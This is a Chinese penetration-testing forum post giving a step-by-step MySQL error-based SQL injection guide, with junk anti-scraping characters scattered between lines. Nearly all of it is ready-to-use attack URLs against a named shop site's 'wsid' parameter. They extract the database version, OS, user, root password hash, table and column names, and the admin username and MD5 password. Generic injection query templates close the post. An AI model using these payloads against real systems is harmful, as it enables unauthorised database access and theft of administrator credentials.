找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2912|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
+ g' Z- q' X6 d: f4 D! C# thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' m7 A" m0 u  c0 w' e* Y- |

1 K8 _8 O0 j3 z& P6 U判断系统
1 h, `5 o+ s: i0 A. t7 g! O, z' ~2 a# c% z  x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' Z, }0 H! |8 N/ z' _! V4 [
! D! _% @9 c: C  b
$ S$ t. @' k& e* q
. `! X) F. t$ G: o当前 user()
- f! e0 c& @4 T
. B. x  D3 R. E/ U' V7 B$ q. Q9 D+ lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# t* A% m( `$ o. c! w$ H
. g: v# T; V. l, O9 a0 H( k
; Y0 U; o4 k: i  m* m* ~% @( k# \- r# k8 L& k( g0 ]8 f
当前 database()' x) m  D  }. j6 u
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* p+ q( y3 a" g- M$ i% k9 k* e' ^% r3 j1 z$ d

& {; u3 k4 j, o; [7 h8 K6 a6 S3 Z
( o. A9 K! }4 ~: K* O
8 v- _' O% k6 h) V( Yroot hash! z4 G4 E8 q2 @$ Y' C" s

" [  ~, i( c) B- Q' Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! H' {% P' S  M9 i7 b. S6 J
* E# k+ V( U2 y- j, |: p& q
+ x2 }0 m3 c2 K2 e

) f5 W" i4 e* s5 C+ E1 `. V当前 数据库表名0 \/ D+ ^9 ?% t- a# F9 M

- s# f8 L$ Q- x' e( Q0 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 X: S% k( ?0 p. i$ u
; C$ j( j, P/ @/ [. _5 W- G8 B
  s( P# e9 L5 g0 J0 p
/ G+ ~/ b9 H4 o" i% [2 b  q当前 数据库 user_name 字段
8 L+ P# }* q+ {5 o  i) w) I* X! C" g/ ~  `5 X- P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" T) ^5 U9 {+ q8 ^+ P( [1 q$ |  @; M

" V* T6 [0 M: c; P* }当前 数据库 字段 password
- b- v8 ^. |* y6 s! P0 p; Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ [1 j7 U! x4 `

) Y( }) N, X+ D& Q% R3 V9 v' i3 u/ C( o# t8 ^( I
( E; Z& r6 f5 O) P. m  K
获得 admin passwd(md5)
& }! y/ C& ^. L, I. {. d! R, }4 Z: X% {0 s/ b

  q( U1 Q* S5 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 V1 y5 r. y- }3 G' @; f% {
4 l# e5 h* N$ C. H0 F
报错注射
8 u7 l  k  S1 c- {+ d0 BSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 U$ t$ V. ]/ J2 o" E6 m; ]& G: P- J" _; w
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
- h* M- ?  X- J1 N  k
! Q! t- }! Z, {3 M) pand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表